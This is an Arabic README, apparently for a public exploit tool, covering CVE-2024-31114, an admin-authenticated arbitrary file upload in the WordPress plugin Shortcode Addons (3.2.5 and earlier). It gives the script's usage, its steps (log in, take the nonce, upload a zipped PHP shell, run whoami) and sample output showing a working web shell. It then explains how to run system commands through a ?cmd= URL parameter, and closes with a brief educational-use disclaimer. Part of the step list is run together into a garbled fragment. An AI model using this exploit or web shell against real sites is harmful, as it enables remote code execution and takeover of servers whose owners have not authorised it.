
Shortcode Addons <= 3.2.5 - رفع ملفات تعسفي (مُصادَق عليه: مسؤول+)
Shortcode Addons <= 3.2.5 – رفع ملفات تعسفي للمستخدمين المصادق عليهم (Admin+)
CVE ID: CVE-2024-31114
CVSS Score: 9.1 (حرجة)
إضافة Shortcode Addons – مع Visual Composer و Divi و Beaver Builder و Elementor Extension في ووردبريس معرّضة لثغرة رفع ملفات تعسفي بسبب عدم التحقق من نوع الملف في جميع الإصدارات حتى 3.2.5 وما دونها.
تسمح هذه الثغرة للمهاجمين المصادَق عليهم بصلاحيات مستوى المسؤول أو أعلى برفع ملفات تعسفية إلى الخادم — مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).
يقوم هذا السكربت المكتوب بلغة Python بأتمتة استغلال الثغرة. وهو يقوم بما يلي:
_wpnonce)nxploit.php).zipwhoami على الخادم الهدفusage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
بمجرد رفع الحمولة، يمكنك تنفيذ أوامر النظام باستخدام الصيغة التالية:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 مثال:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
سيؤدي هذا إلى عرض محتويات المجلد الحالي على الخادم.
هذه الأداة لأغراض تعليمية واختبارات مصرّح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر يسببه هذا السكربت.
استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.
بواسطة: Nxploited | Khaled Alenazi